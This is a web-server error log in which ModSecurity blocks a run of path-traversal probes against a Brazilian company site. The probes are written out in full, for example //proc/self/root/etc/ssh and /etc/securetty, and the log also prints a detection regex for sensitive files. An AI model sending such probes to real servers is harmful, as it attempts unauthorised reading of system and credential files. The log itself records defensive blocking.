[Wed Mar 18 09:01:37.991139 2026] [:error] [pid 26799:tid 140411548894976] [client 216.73.216.191:20778] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUIda6ubjKNq_cu4aHAgAAA1c"]
[Wed Mar 18 09:01:42.971090 2026] [:error] [pid 17653:tid 140411557287680] [client 216.73.216.191:24521] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUJsdf6f5d65gmYZTC_gAAAtY"]
[Wed Mar 18 09:01:43.311358 2026] [:error] [pid 15826:tid 140411616036608] [client 216.73.216.191:34930] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUJ-oXxyEfFpUF8f9cowAAAU8"]
[Wed Mar 18 09:01:43.865930 2026] [:error] [pid 15051:tid 140411708356352] [client 216.73.216.191:43963] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUJymAPhZkrhU8w4lbXQAAAIQ"]
[Wed Mar 18 09:01:45.107509 2026] [:error] [pid 19507:tid 140411565680384] [client 216.73.216.191:21388] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUKdY0UrI5A3LftIyQQwAAAZU"]
[Wed Mar 18 09:01:45.560146 2026] [:error] [pid 30077:tid 140411658000128] [client 216.73.216.191:20334] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUKfu8EFLIOrSqIpvziwAAAko"]
[Wed Mar 18 09:01:48.902960 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:53352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqULEzinOy1jxa1j4cCaAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:01:54.342931 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:48474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUMgkwaGbbGflqUZD-0wAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:01:59.232733 2026] [:error] [pid 29882:tid 140411624429312] [client 216.73.216.191:51100] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUNEzinOy1jxa1j4cCdwAAAQ4"]
[Wed Mar 18 09:02:00.752728 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:48478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUOOyqAr6etmhZHNqsYQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:02:02.553241 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:57978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUOvu8EFLIOrSqIpvzngAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:02:05.147757 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:57990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUPeoXxyEfFpUF8f9cuQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:02:05.879884 2026] [:error] [pid 17653:tid 140411649607424] [client 216.73.216.191:60715] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUPcdf6f5d65gmYZTDFwAAAss"]
[Wed Mar 18 09:02:06.572802 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:57998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUPimAPhZkrhU8w4lbfwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:02:07.947797 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:58004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUP9a6ubjKNq_cu4aHJwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:02:12.097359 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:58006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUROoXxyEfFpUF8f9cxwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:02:18.531453 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:52538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUSsdf6f5d65gmYZTDIwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:02:23.972020 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:39244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUT9Y0UrI5A3LftIyQjgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:02:24.495771 2026] [mime_magic:error] [pid 19507:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:39244] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/local
[Wed Mar 18 09:02:28.071499 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:39248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUVPu8EFLIOrSqIpvzvgAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:02:29.010978 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:36304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUVfu8EFLIOrSqIpvzvwAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:02:38.122237 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:53352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUXuyqAr6etmhZHNqseAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:02:48.907671 2026] [:error] [pid 19507:tid 140411674785536] [client 216.73.216.191:33046] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUaNY0UrI5A3LftIyQ_QAAAYg"]
[Wed Mar 18 09:02:56.239435 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:33704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUcMdf6f5d65gmYZTDRAAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:03:07.378988 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.244.43:41632] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqUe-yqAr6etmhZHNqsogAAAFU"]
[Wed Mar 18 09:03:08.444647 2026] [mime_magic:error] [pid 30077:tid 140411699963648] (70014)End of file found: [client 57.141.18.40:55982] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:03:10.996418 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.228.61:36398] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqUfgkwaGbbGflqUZD_WQAAAMk"]
